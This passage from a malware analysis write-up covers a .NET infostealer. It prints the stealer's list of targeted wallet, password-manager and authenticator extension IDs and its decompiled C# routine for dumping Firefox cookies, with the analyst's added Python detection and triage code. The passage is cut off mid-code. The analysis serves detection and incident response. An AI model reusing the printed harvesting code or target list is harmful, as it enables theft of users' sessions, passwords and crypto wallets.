It then collects data from the crypto wallet browser extensions in this list (which also contains password manager and authenticator extensions), if they exist. Each entry is an extension ID followed by the extension name:
"cgeeodpfagjceefieflmdfphplkenlfk|EVER Wallet",
"acmacodkjbdgmoleebolmdjonilkdbch|Rabby",
"nhnkbkgjikgcigadomkphalanndcapjk|Clover Wallet",
"cnmamaachppnkjgnildpdmkaakejnhae|Auro Wallet",
"jojhfeoedkpkglbfimdfabpdfjaoolaf|Polymesh Wallet",
"nknhiehlklippafakaeklbeglecifhad|Nabox Wallet",
"ookjlbkiijinhpmnjffcofjonbfbgaoc|Temple",
"dkdedlpgdmmkkfjabffeganieamfklkm|Cyano Wallet",
"cihmoadaighcejopammfbmddcmdekcje|LeafWallet",
"lodccjjbdhfakaekdiahmedfbieldgik|DAppPlay",
"ijmpgkjfkbfhoebgogflfebnmejmfbml|BitClip",
"onofpnbbkehpmmoabgpcpmigafmmnjhl|Nash Extension",
"bcopgchhojmggmffilplmbdicgaihlkp|Hycon Lite Client",
"klnaejjgbibmhlephnhpmaofohgkpgkd|ZilPay",
"algblmhagnobbnmakepomicmfljlbehg|ADS Wallet",
"jccapkebeeiajkkdemacblkjhhhboiek|Crust Wallet",
"agechnindjilpccclelhlbjphbgnobpf|Fractal Wallet",
"jnldfbidonfeldmalbflbmlebbipcnle|Bitfinity Wallet",
"jblndlipeogpafnldhgmapagcccfchpi|Kaikas",
"bkklifkecemccedpkhcebagjpehhabfb|MetaWallet",
"ifckdpamphokdglkkdomedpdegcjhjdp|ONTO Wallet",
"icblpoalghoakidcjiheabnkijnklhhe|PIP",
"cfbfdhimifdmdehjmkdobpcjfefblkjm|Plug",
"epapihdplajcdnnkdeiahlgigofloibg|Sender Wallet",
"pocmplpaccanhmnllbbkpgfliimjljgo|Slope Wallet",
"mfhbebgoclkghebffdldpobeajmbecfk|StarMask",
"fgkaeeikaoeiiggggbgdcjchmdfmamla|Vtimes",
"odaegfdpkolgbdaeibcebmibmibchbce|WaykiMax",
"ppdadbejkmjnefldpcdjhnkpbjkikoip|Oasis Wallet",
"fcckkdbjnoikooededlapcalpionmalo|MOBOX WALLET",
"nphplpgoakhhjchkkhmiggakijnkhfnd|TON WALLET",
"ckelpdlfgochnkdgikcgbimdcfgpkhgk|Theta Wallet",
"bofddndhbegljegmpmnlbhcejofmjgbn|eckoWALLET",
"bgjogpoidejdemgoochpnkmdjpocgkha|Ecto Wallet",
"dlcobpjiigpikoobohmabehhmhfoodbb|Argent X StarkNet Wallet",
"kfdniefadaanbjodldohaedphafoffoh|Typhon Wallet",
"mapbhaebnddapnmifbbkgeedkeplgjmf|Biport Wallet",
"jkoeaghipilijlahjplgbfiocjhldnap|Mask Network",
"agkfnefiabmfpanochlcakggnkdfmmjd|Earth Wallet",
"pnndplcbkakcplkjnolgbkdgjikjednm|Tron Wallet & Explorer",
"jiidiaalihmmhddjgbnbgdfflelocpak|Bitget Wallet (formerly BitKeep)",
"cmndjbecilbocjfkibfbifhngkdmjgog|Swash",
"lpilbniiabackdjcionkobglmddfbcjo|Waves Keeper",
"ammjpmhgckkpcamddpolhchgomcojkle|Scatter",
"bopcbmipnjdcdfflfgjdgdjejmgpoaab|BlockWallet",
"kkilomkmpmkbdnfelcpgckmpcaemjcdh|CeloExtensionWallet",
"aholpfdialjgjfhomihkjbmgjidlcdno|Exodus Web3 Wallet",
"jnlgamecbpmbajjfhmmmlhejkemejdma|Braavos (StarkNet) Wallet",
"mcohilncbfahbmgdjkbpemcciiolgcge|OKX Web3 Wallet",
"phkbamefinggmakgklpkljjmgibohnba|Pontem Wallet",
"ejjladinnckdgjemekebdpeokbikhfci|Petra Wallet",
"efbglgofoippbgcjepnhiblaibcnclgk|Martian Wallet",
"cjmkndjhnagcfbpiemnkdpomccnjblmj|Finnie Wallet",
"aijcbedoijmgnlmjeegjaglmepbmpkpi|Leap Terra",
"hnhobjmcibchnmglfbldbfabcgaknlkj|Flint Wallet",
"opcgpfmipidbgpenhmajoajpbobppdil|Sui Wallet",
"hpclkefagolihohboafpheddmmgdffjm|Flow Wallet (formerly Lilico)",
"eajafomhmkipbjmfmhebemolkcicgfmd|Taho",
"gmcpomojcoaopogcbhpchfpdpfaabihc|BeFi Wallet",
"ejehodfgjhiadihgjdkgffciiepfdeep|FINX Wallet",
"bocpokimicclpaiekenaeelehdjllofo|XDCPay",
"eokbbaidfgdndnljmffldfgjklpjkdoi|Fluent",
"cflgahhmjlmnjbikhakapcfkpbcmllam|Ale",
"jnkelfanjkeadonecabehalmbgpfodjm|Goby",
"gkeelndblnomfmjnophbhfhcjbcnemka|Bitverse Wallet (formerly Teleport)",
"egjidjbpglichdcondbcbdnbeeppgdph|Trust Wallet",
"lgmpcpglpngdoalbgeoldeajfclnhafa|SafePal Wallet",
"fcfcfllfndlomdhbehjjcoimbgofdncg|Leap Cosmos Wallet",
"ebfidpplhabeedpnhjnobghokpiioolj|Fewcha Move Wallet",
"hbbgbephgojikajhfbomhlmmollphcad|Rise - Aptos Wallet",
"nngceckbapebfimnlniiiahkandclblb|Bitwarden - Free Password Manager",
"oboonakemofpalcgghocfoadofidjkkk|KeePassXC-Browser",
"dphoaaiomekdhacmfoblfblmncpnbahm|ChromeKeePass",
"mmhlniccooihdimnnjhamobppdhaolme|Kee - Password Manager",
"kmcfomidfpdkfieipokbalgegidffkal|Enpass Password Manager",
"fmhmiaejopepamlcjkncpgpdjichnecm|KeePass Tusk - Password Access",
"jgnfghanfbjmimbdmnjfofnbcgpkbegj|KeePassHelper Password Manager",
"lgbjhdkjmpgjgcbcdlhkokkckpjmedgc|DualSafe Password Manager",
"pnlccmojcmeohlpggmfnbbiapkmbliob|RoboForm Password Manager",
"hdokiejnpimakedhajhdlcegeplioahd|LastPass: Free Password Manager",
"hifafgmccdpekplomjjkcfgodnhcellj|Crypto.com",
"fpkhgmpbidmiogeglndfbkegfdlnajnf|Cosmostation Wallet",
"ckklhkaabbmdjkahiaaplikpdddkenic|Internet Money - Crypto Wallet",
"hoighigmnhgkkdaenafgnefkcmipfjon|EO.Finance: Crypto & Fiat Wallet",
"kilnpioakcdndlodeeceffgjdpojajlo|Aurox Wallet",
"icpikagpkkbldbfjlbefnmmmcohbjije|Z3US",
"onhogfjeacnfoofkfgppdlbmlmnplgbn|SubWallet - Polkadot",
"gjagmgiddbbciopjhllkdnddhcglnemk|Hashpack",
"nbdpmlhambbdkhkmbfpljckjcmgibalo|Halo Wallet (formerly KuCoin)",
"mcbigmjiafegjnnogedioegffbooigli|Ethos Sui Wallet",
"jkjgekcefbkpogohigkgooodolhdgcda|Pay with BitPay",
"fiikommddbeccaoicoejoniammnalkfa|Nightly",
"iokeahhehimjnekafflcihljlcjccdbe|Alby - Bitcoin",
"idnnbdplmphpflfnlkomgpfbpcgelopg|Xverse Wallet",
"bgpipimickeadkjlklgciifhnalhdjhe|GeroWallet",
"hpbgcgmiemanfelegbndmhieiigkackl|Monsta Wallet",
"jnmbobjmhlngoefaiojfljckilhhlhcj|OneKey",
"fijngjgcjhjmmpcmkeiomlglpeiijkld|Talisman - Polkadot Wallet",
"agoakfejjabomempkjlepdflaleeobhb|Core - Crypto & NFT Wallet",
"pgiaagfkgcbnmiiolekcfmljdagdhlcm|Stargazer Wallet",
"kkpllkodjeloidieedojogacfhpaihoh|Enkrypt Wallet",
"mmclamjkknobggpiohfneimmnlggagok|LEDGIS Wallet",
"ocjobpilfplciaddcbafabcegbilnbnb|XPLA Vault Wallet",
"bhhhlbepdkbapadjdnnojkbgioiodbic|Solflare Wallet",
"kmhcihpebfmpgmihbkipmjlmmioameka|Eternl",
"aiaghdjafpiofpainifbgfgjfpclngoh|Safeheron",
"pfdaepphglddodhkmcfoefimbcnkipmn|Spot wallet",
"imeelmcnggkkokgfhinnjhjfilibhpaj|SimpleHold",
"apnehcjmnengpnmccpaibjmhhoadaico|CWallet",
"gjlmehlldlphhljhpnlddaodbjjcchai|Nautilus Wallet",
"ilhaljfiglknggcoegeknjghdgampffk|Beam Web Wallet",
"jbkgjmpfammbgejcpedggoefddacbdia|Parallel wallet",
"loinekcabhlmhjjbocijdoimmejangoa|Glass wallet - Sui wallet",
"khpkpbbcccdmmclmpigdgddabeilkdpd|Suiet - Sui Wallet",
"heefohaffomkkkphnlpohglngmbcclhi|Morphis Wallet",
"mfgccjchihfkkindfppnaooecgfneiii|TokenPocket",
"cnncmdhjacpkmjmkcafchppbnpnhdmon|HAVAH Wallet",
"gjkdbeaiifkpoencioahhcilildpjhgh|partisia-wallet",
"lnaackabbghipdbjfhdhjempeiopmpop|SwappID",
"bmabahhenimmnfijaiccmonalfhpcndh|Relation ONE",
"inlfbeejfdgkknpiodhemfcokbdgofja|DeNet",
"ojbcfhjmpigfobfclfflafhblgemeidi|Glow - Solana Wallet BETA",
"emeeapjkbcbpbpgaagfchmcgglmebnen|Surf Wallet",
"ajkifnllfhikkjbjopkhmjoieikeihjb|Moso: Shop and Earn Crypto",
"aflkmfhebedbjioipglgcbcmnbpgliof|Backpack",
"eegcfalgkkhehkhbjbggbhhlcnckadih|Jellywallet",
"gpnihlnnodeiiaakbikldcihojploeca|NuFi",
"pcndjhkinnkaohffealmlmhaepkpmgkb|Meteor Wallet",
"hfljlochmlccoobkbcgpmkpjagogcgpk|Solana Wallet",
"enabgbdfcbaehmbigakijjabdpdnimlg|Manta Wallet",
"fghhpjoffbgecjikiipbkpdakfmkbmig|IDriss",
"mmmjbcfofconkannjonfmjjajpllddbg|Fluvi Wallet",
"kbdcddcmgoplfockflacnnefaehaiocb|Shell Wallet",
"anokgmphncpekkhclmingpimjmcooifb|Compass Wallet for Sei",
"dbgnhckhnppddckangcjbkjnlddbjkna|Fin Wallet For Sei",
"feejiigddaafeojfddjjlmfkabimkell|Bitski",
"bifidjkcdpgfnlbcjpdkdcnbiooooblg|Fuelet Wallet",
"abjfbanhppgiflmobebfffbijcfoeiao|Kontos",
"klghhnkeealcohjjanjjdaeeggmfmlpl|Zerion: Wallet for Web3 & NFTs",
"ahidmapichficbkfglbhgmhjcojjmlnm|KEKKAI",
"dldjpboieedgcmpkchcjcbijingjcgok|Fuel Wallet",
"fopmedgnkfpebgllppeddmmochcookhc|Suku Wallet",
"kglcipoddmbniebnibibkghfijekllbl|Fire",
"lmkncnlpeipongihbffpljgehamdebgi|DPal:Wallet for DogeCoin",
"keenhcnmdmjjhincpilijphpiohdppno|5irechain Wallet",
"ojbpcbinjmochkhelkflddfnmcceomdi|Zecrey",
"ppbibelpcjmhbdihakflkdcoccbgbkpo|UniSat Wallet",
"coefgobimbelhfmhkpndlddjhkphgnep|OrdinalSafe",
"ojggmchlghnjlapmfbnjholfjkiidbch|Venom Wallet",
"jallplgmgfjfgfhplcnbcpjbpijmgdnc|Wave Wallet",
"ghpilmjholiicaobfjdkefcogmgaabif|Goblin Wallet",
"ldinpeekobnhjjdofggfgjlcehhmanlj|Leather",
"papngmkmknnmfhabbckobgfpihpdgplk|BearBy",
"nhbicdelgedinnbcidconlnfeionhbml|Begin Wallet",
"gafhhkghbfjjkeiendhlofajokpaflmk|Lace",
"abogmiocnneedmmepnohnhlijcjpcifd|Blade Wallet",
"gdokollfhmnbfckbobkdbakhilldkhcj|Alephium Wallet",
"gadbifgblmedliakbceidegloehmffic|Paragon Wallet",
"fbeiiganbeffhobegddakpmplljhmfnd|Sparrow Ubiq Wallet",
"fcjkomdnccnlklmhncgmaehaakjkddnk|Samara Wallet",
"mjgkpalnahacmhkikiommfiomhjipgjn|Reef Chain Wallet",
"adganlhbinonbpfiehjjpmklkbghkaio|SendWallet",
"jiepnaheligkibgcjgjepjfppgbcghmp|Doge Labs Wallet",
"ionnbdlogiaapopodiglgaakhiifihcl|Kayros Wallet",
"elalghlhoepcjfaedkcmjolahamlnjcp|Bitgreen Wallet",
"ocjdpmoallmgmjbbogfiiaofphbjgchh|ELLI Suit Wallet",
"einnioafmpimabjcddiinlhmijaionap|ArConnect Wallet",
"fmblappgoiilbgafhjklehhfifbdocee|Forbole X",
"nhlnehondigmgckngjomcpcefcdplmgc|Fearless Wallet",
"ginchbkmljhldofnbjabmeophlhdldgp|PolkaGate",
"ahcefhodjjnpmeeaghfhocjiicghdcbn|4thTech Wallet",
"jcacnejopjdphbnjgfaaobbfafkihpep|Hive Keychain Wallet",
"gbjepgaebckfidagpfeioimheabiohmg|ZEON Wallet",
"odpnjmimokcmjgojhnhfcnalnegdjmdn|YETI Wallet",
"abamjefkidngfegdjbmffdmbgjgpaobf|Doter Wallet",
"oohllogfdpaojikdjjkfmklabefnkkfk|Jigstack Wallet",
"eamiofncoknfkefhlkdblngblpffehek|Verto Wallet",
"kkpllbgjhchghjapjbinnoddmciocphm|Ninji Wallet",
"mopnmbcafieddcagagdcbnhejhlodfdd|Polkadot.js Wallet",
"lccbohhgfkdikahanoclbdmaolidjdfl|Wigwam Wallet",
"nlobpakggmbcgdbpjpnagmdbdhdhgphk|Shiba Wallet",
"nlgnepoeokdfodgjkjiblkadkjbdfmgd|Multi Wallet",
"kppfdiipphfccemcignhifpjkapfbihd|Frontier wallet",
"nopnfnlbinpfoihclomelncopjiioain|Viction Wallet",
"nbdhibgjnjpnkajaghbffjbkcgljfgdi|Ramper Wallet",
"panpgppehdchfphcigocleabcmcgfoca|Desig Wallet",
"bkgplkpdgidlgmnlhdfakhcjfpfgjjkb|Ancient8 Wallet",
"eomhlheglneofffmbfjflldlbcnhpkpb|TronBoss",
"inlkhilmjmjomfcpdifpfgllhhlpnbej|UniElon",
"ghlmndacnhlaekppcllcpcjjjomjkjpg|Wizz Wallet",
"jbppfhkifinbpinekbahmdomhlaidhfm|iWallet Pro",
"ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet",
"ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink",
"jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet",
"nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask",
"afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet",
"hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase",
"fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain",
"odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet",
"hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet",
"blnieiiffboillknjnepogjhkgnoapac|EqualWallet",
"cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty",
"fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet",
"kncchdigobghenbbaddojjnnaogfppfj|iWallet",
"amkmjjmmflddogmhpjloimipbofnfjih|Wombat",
"fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet",
"nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx",
"nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet",
"nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet",
"fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet",
"aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation",
"fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet",
"aeachknmefphepccionboohckonoeemg|Coin98Wallet",
"pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain",
"bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom",
"mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet",
"aodkkagnadcbobfpggfnjeongemjbjca|BoltX",
"kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet",
"hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet",
"lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet",
"dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet",
"ejbalbakoplchlghecdalmeeeajnimhm|MetaMask Edge",
"mlbafbjadjidklbhgopoamemfibcpdfi|GoblinWallet",
"bhghoamapcdpbohphigoooaddinpkbai|Authenticator",
"oeljdldpnmdbchonielidgobddffflal|EOS Authenticator",
"naepdomgkenhinolocfifgehidddafch|BrowserPass",
"bmikpgodpkclnkgmnpphehdgcimmided|MYKI",
"jhfjfclepacoldmjmkmdlmganfaalklb|Splikity",
"chgfefjpcobfbnpmiokfjjaglahmnded|CommonKey",
"igkpcodhieompeloncfnbekccinhapdb|Zoho Vault",
"admmjipmmciaobhojoghlmleefbicajg|Norton Password Manager",
"caljgklbbfbcjjanaijlacgncafpegll|Avira Password Manager",
"imloifkgjagghnncjkhggdhalmcnfklk|Trezor Password Manager",
"cphhlgmgameodnhkjdmkpanlelnlohao|NeoLine",
"dmkamcknogkgcdfhhbddcghachkejeap|Keplr",
"fhmfendgdocmcbmfikdcogofphimnkno|Sollet",
"flpiciilemghbmfalicajoolhkkenfel|ICONex",
"hcflpincpppdclinealmandijcmnkbgn|KHC",
"mnfifefkajgofkcjkemidiaecocnkjeh|TezBox",
"nlgbhdfgdhgbiamfdfmbikcdghidoadd|Byone",
"ilbbpajmiplgpehdikmejfemfklpkmke|OneKey",
"pknlccmneadmjbkollckpblgaaabameg|Trust Wallet",
"pfknkoocfefiocadajpngdknmkjgakdg|MetaWallet",
"fcglfhcjfpkgdppjbglknafgfffkelnm|Guarda Wallet",
"idkppnahnmmggbmfkjhiakkbkdpnmnon|Exodus",
"mhonjhhcgphdphdjcdoeodfdliikapmj|Jaxx Liberty",
"bhmlbgebokamljgnceonbncdofmmkedg|Atomic Wallet",
"hieplnfojfccegoloniefimmbfjdgcgp|Electrum",
"pidhddgciaponoajdngciiemcflpnnbg|Mycelium",
"blbpgcogcoohhngdjafgpoagcilicpjh|Coinomi",
"gflpckpfdgcagnbdfafmibcmkadnlhpj|GreenAddress",
"doljkehcfhidippihgakcihcmnknlphh|Edge",
"nbokbjkelpmlgflobbohapifnnenbjlh|BRD",
"apjdnokplgcjkejimjdfjnhmjlbpgkdi|Samourai Wallet",
"ieedgmmkpkbiblijbbldefkomatsuahh|Copay",
"jifanbgejlbcmhbbdbnfbfnlmbomjedj|Bread",
"dojmlmceifkfgkgeejemfciibjehhdcl|KeepKey",
"jpxupxjxheguvfyhfhahqvxvyqthiryh|Trezor",
"pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln|Ledger Live",
"hbpfjlflhnmkddbjdchbbifhllgmmhnm|Ledger Wallet",
"ocmfilhakdbncmojmlbagpkjfbmeinbd|Bitbox",
"dbhklojmlkgmpihhdooibnmidfpeaing|Digital Bitbox",
"mammpjaaoinfelloncbbpomjcihbkmmc|YubiKey",
"khcodhlfkpmhibicdjjblnkgimdepgnd|Google Authenticator",
"bfbdnbpibgndpjfhonkflpkijfapmomn|Microsoft Authenticator",
"gjffdbjndmcafeoehgdldobgjmlepcal|Authy",
"eidlicjlkaiefdbgmdepmmicpbggmhoj|Duo Mobile",
"bobfejfdlhnabgglompioclndjejolch|OTP Auth",
"elokfmmmjbadpgdjmgglocapdckdcpkn|FreeOTP",
"ppdjlkfkedmidmclhakfncpfdmdgmjpm|Aegis Authenticator",
"cfoajccjibkjhbdjnpkbananbejpkkjb|LastPass Authenticator",
"flikjlpgnpcjdienoojmgliechmmheek|Dashlane",
"gofhklgdnbnpcdigdgkgfobhhghjmmkj|Keeper",
"hppmchachflomkejbhofobganapojjol|RoboForm",
"lbfeahdfdkibininjgejjgpdafeopflb|KeePass",
"kgeohlebpjgcfiidfhhdlnnkhefajmca|KeePassXC",
"inljaljiffkdgmlndjkdiepghpolcpki|Bitwarden",
"njgnlkhcjgmjfnfahdmfkalpjcneebpl|NordPass",
"gabedfkgnbglfbnplfpjddgfnbibkmbb|LastPass",
"ocglkepbibnalbgmbachknglpdipeoio|Edge_Authenticator"
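The two lists above are the most directly actionable part of the stealer for detection: no single read of Login Data or cookies.sqlite is suspicious (the browser does that constantly), but one process reading credential stores from several different browser roots within seconds is. The following is an added example for this write-up, not the stealer’s code and not a vendor rule. It turns short excerpts of both lists into a watchlist and replays constructed file-access events (timestamp, pid, image, path), the kind an EDR or Sysmon file feed provides, through that burst rule. How the stealer itself uses the wallet list is not shown in this section, so the wallet check assumes only that the extension’s storage directory is read; the Local Extension Settings\<id> location is the standard Chromium layout.

```python
"""Burst detector for the stealer's browser-data sweep.

Added example for this write-up; not the stealer's code and not a vendor
rule. Events and paths below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Short excerpts of the two lists on the page.
BROWSER_PATHS = [
    r"%PAPAGEY%\AppData\Roaming\Mozilla\Firefox",
    r"%PAPAGEY%\AppData\Local\Google\Chrome\User Data",
    r"%PAPAGEY%\AppData\Local\Microsoft\Edge\User Data",
    r"%PAPAGEY%\AppData\Local\BraveSoftware\Brave-Browser\User Data",
]
WALLET_EXTENSIONS = [
    "nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom",
    "nngceckbapebfimnlniiiahkandclblb|Bitwarden - Free Password Manager",
    "jpxupxjxheguvfyhfhahqvxvyqthiryh|Trezor",  # not a valid Web Store id, see below
]
# File names the stealer requests from FilveM.DirTester/LocTester on this page.
TARGET_FILES = {"login data", "web data", "cookies", "cookies.sqlite", "local state"}
# Chromium keeps per-extension storage under <profile>\Local Extension Settings\<id>.
EXT_SETTINGS = re.compile(r"\\local extension settings\\([a-p]{32})\\")


def expand_paths(user_profile, paths=BROWSER_PATHS):
    """Replace the %PAPAGEY% placeholder with the user profile dir, lower-cased."""
    return [p.replace("%PAPAGEY%", user_profile).lower() for p in paths]


def parse_extension_list(entries=WALLET_EXTENSIONS):
    """'id|name' -> {id: name}. Web Store ids are 32 letters from a-p (hex digits
    mapped onto a-p), so an entry like the Trezor one can never match and is dropped."""
    result = {}
    for line in entries:
        ext_id, _, name = line.partition("|")
        if re.fullmatch(r"[a-p]{32}", ext_id):
            result[ext_id] = name
    return result


def classify(path, roots, wallets):
    """('store', root), ('wallet', name) or None for one accessed path."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    for root in roots:
        if p.startswith(root + "\\") and name in TARGET_FILES:
            return ("store", root)
    m = EXT_SETTINGS.search(p)
    if m and m.group(1) in wallets:
        return ("wallet", wallets[m.group(1)])
    return None


def detect_sweep(events, user_profile, min_roots=3, window=timedelta(seconds=30)):
    """events: iterable of (datetime, pid, image, path). Returns (pid, image, reason)
    tuples: one sweep alert per process, one alert per wallet-storage read."""
    roots = expand_paths(user_profile)
    wallets = parse_extension_list()
    history = defaultdict(list)   # (pid, image) -> [(ts, root), ...]
    swept = set()
    alerts = []
    for ts, pid, image, path in events:
        hit = classify(path, roots, wallets)
        if hit is None:
            continue
        kind, label = hit
        if kind == "wallet":
            alerts.append((pid, image, "wallet extension storage read: " + label))
            continue
        key = (pid, image)
        history[key].append((ts, label))
        recent = {r for t, r in history[key] if ts - t <= window}
        if len(recent) >= min_roots and key not in swept:
            swept.add(key)
            alerts.append((pid, image, "sweep across %d browser roots" % len(recent)))
    return alerts


# Constructed telemetry: the browser reading its own store, then an unrelated
# process walking three browsers and a wallet extension within seconds.
T0 = datetime(2024, 5, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    (T0, 4120, "chrome.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (T0 + timedelta(seconds=1), 7788, "update.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (T0 + timedelta(seconds=2), 7788, "update.exe", r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Profile 1\Web Data"),
    (T0 + timedelta(seconds=3), 7788, "update.exe", r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default\cookies.sqlite"),
    (T0 + timedelta(seconds=4), 7788, "update.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\000003.log"),
    (T0 + timedelta(minutes=5), 4120, "chrome.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
]

if __name__ == "__main__":
    for alert in detect_sweep(SAMPLE_EVENTS, r"C:\Users\alice"):
        print(alert)
```

In production the rule would additionally exclude the signed browser binaries themselves and backup agents, and the full path and extension lists from the page would replace the excerpts; the threshold of three roots in thirty seconds is a starting point, not a tuned value.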
In the NexuiVzyat class:
using System;
using System.Collections.Generic;
using System.IO;
namespace Ishimsky
{
// Token: 0x0200000A RID: 10
internal class NexuiVzyat
{
// Token: 0x0600001A RID: 26 RVA: 0x00003338 File Offset: 0x00001538
public static List<string> Goryachy(List<string> paths)
{
List<string> result = new List<string>();
try
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile);
foreach (string text in paths)
{
try
{
foreach (string text2 in FilveM.DirTester(text.Replace("%PAPAGEY%", folderPath), new string[]
{
"cookies.sqlite"
}))
{
string fullName = new FileInfo(text2).Directory.FullName;
string text3 = text2.Contains(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) ? NexuiVzyat.FRX1(fullName) : NexuiVzyat.FRX2(fullName);
bool flag = !string.IsNullOrEmpty(text3);
bool flag2 = flag;
if (flag2)
{
FiveW.Cliator(string.Concat(new string[]
{
ModelGeev.patriarh,
"/Cookies/[Geko]",
text3,
"_",
new DirectoryInfo(fullName).Name,
".txt"
}), "cookieold|null", NexuiVzyat.FRXCookiesByProfile(fullName));
}
}
}
catch
{
}
}
}
catch (Exception)
{
}
return result;
}
// Token: 0x0600001B RID: 27 RVA: 0x000034F8 File Offset: 0x000016F8
private static List<string> FRXCookiesByProfile(string prf)
{
List<string> list = new List<string>();
try
{
string text = Path.Combine(prf, "cookies.sqlite");
bool flag = !File.Exists(text);
if (flag)
{
return list;
}
Ridik ridik = new Ridik(text);
ridik.ReadContextTable("moz_cookies");
int i = 0;
while (i < ridik.RowLength)
{
string text2 = null;
try
{
text2 = string.Concat(new string[]
{
ridik.ReadContextValue(i, 4).Trim(),
"\t",
(ridik.ReadContextValue(i, 4).Trim()[0] == '.').ToString(),
"\t",
ridik.ReadContextValue(i, 5).Trim(),
"\t",
(ridik.ReadContextValue(i, 9)[0] == '1').ToString(),
"\t",
ridik.ReadContextValue(i, 6).Trim(),
"\t",
ridik.ReadContextValue(i, 2).Trim(),
"\t",
ridik.ReadContextValue(i, 3)
});
}
catch
{
}
i++;
bool flag2 = text2 != null;
if (flag2)
{
list.Add(text2);
}
}
}
catch
{
}
ModelGeev.c += list.Count;
return list;
}
// Token: 0x0600001C RID: 28 RVA: 0x000036A8 File Offset: 0x000018A8
public static string FRX1(string pfd)
{
string result = string.Empty;
try
{
pfd = pfd.Replace(Environment.ExpandEnvironmentVariables("%appdata%\\"), string.Empty);
string[] array = pfd.Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
bool flag = array[2] == "Profiles";
bool flag2 = flag;
if (flag2)
{
result = array[1];
}
else
{
result = array[0];
}
}
catch
{
}
return result;
}
// Token: 0x0600001D RID: 29 RVA: 0x00003728 File Offset: 0x00001928
public static string FRX2(string pfd)
{
string result = string.Empty;
try
{
pfd = pfd.Replace(Environment.ExpandEnvironmentVariables("%localappdata%\\"), string.Empty);
string[] array = pfd.Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
bool flag = array[2] == "Profiles";
bool flag2 = flag;
if (flag2)
{
result = array[1];
}
else
{
result = array[0];
}
}
catch
{
}
return result;
}
}
}
Goryachy method:
- Accepts a list of paths, checks them for cookies.sqlite files, and processes the ones it finds to extract cookie information.
- It constructs the output file name from the profile’s directory and writes the cookie information to text files under the Cookies folder.
FRXCookiesByProfile method:
- Reads the cookies.sqlite file of a browser profile and extracts cookie details from the moz_cookies table.
- Compiles the cookie data into a list of tab-separated strings carrying the cookie attributes (host, path, secure flag, expiration, name and value).
FRX1 and FRX2 methods:
- These methods process file paths to derive the profile name, depending on whether the path points into the AppData (Roaming) or LocalAppData directory.
- They help identify whether the path relates to a specific browser profile or a different directory structure.
The class is designed to collect and organize cookie data from different browsers, swallowing exceptions so that a failure on one profile does not stop the collection.
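For incident response the interesting artefact is the dump itself: FRXCookiesByProfile writes one tab-separated line per moz_cookies row in the order host, whether the host starts with a dot, path, isSecure, expiry, name, value, with C# “True”/“False” booleans, which is the Netscape cookies.txt layout. The following is an added example for this write-up, not the stealer’s code: a triage parser that reads such a dump and, given the time of compromise, reports the hosts whose sessions were still live and therefore need to be revoked. It assumes the column indices the stealer reads (4, 5, 6, 9, 2, 3) correspond to host, path, expiry (Unix seconds), isSecure, name and value of the current moz_cookies schema; the dump content below is constructed and the values are placeholders.

```python
"""Triage parser for the cookie dumps Goryachy writes to the Cookies folder.

Added example for this write-up, not the stealer's code. Sample dump is
constructed; cookie values are never copied into the report.
"""
from datetime import datetime, timezone
from typing import NamedTuple


class Cookie(NamedTuple):
    host: str
    domain_wide: bool   # leading '.' => sent to all subdomains
    path: str
    secure: bool
    expiry: int         # Unix seconds (moz_cookies.expiry, assumed)
    name: str
    value: str


def parse_dump(text):
    """Parse one dump file. Malformed lines are skipped, mirroring the stealer,
    which drops rows it fails to format."""
    cookies = []
    for raw in text.splitlines():
        parts = raw.split("\t")
        if len(parts) != 7:
            continue
        host, domain_wide, path, secure, expiry, name, value = parts
        try:
            expiry_ts = int(expiry)
        except ValueError:
            continue
        cookies.append(Cookie(host, domain_wide == "True", path,
                              secure == "True", expiry_ts, name, value))
    return cookies


def live_sessions(cookies, at):
    """{host: {cookie names}} for cookies unexpired at `at`, given as Unix
    seconds or a datetime (naive datetimes are taken as UTC). Names only:
    that is enough to decide which sessions to invalidate."""
    if isinstance(at, datetime):
        if at.tzinfo is None:
            at = at.replace(tzinfo=timezone.utc)
        at = int(at.timestamp())
    live = {}
    for c in cookies:
        if c.expiry > at:
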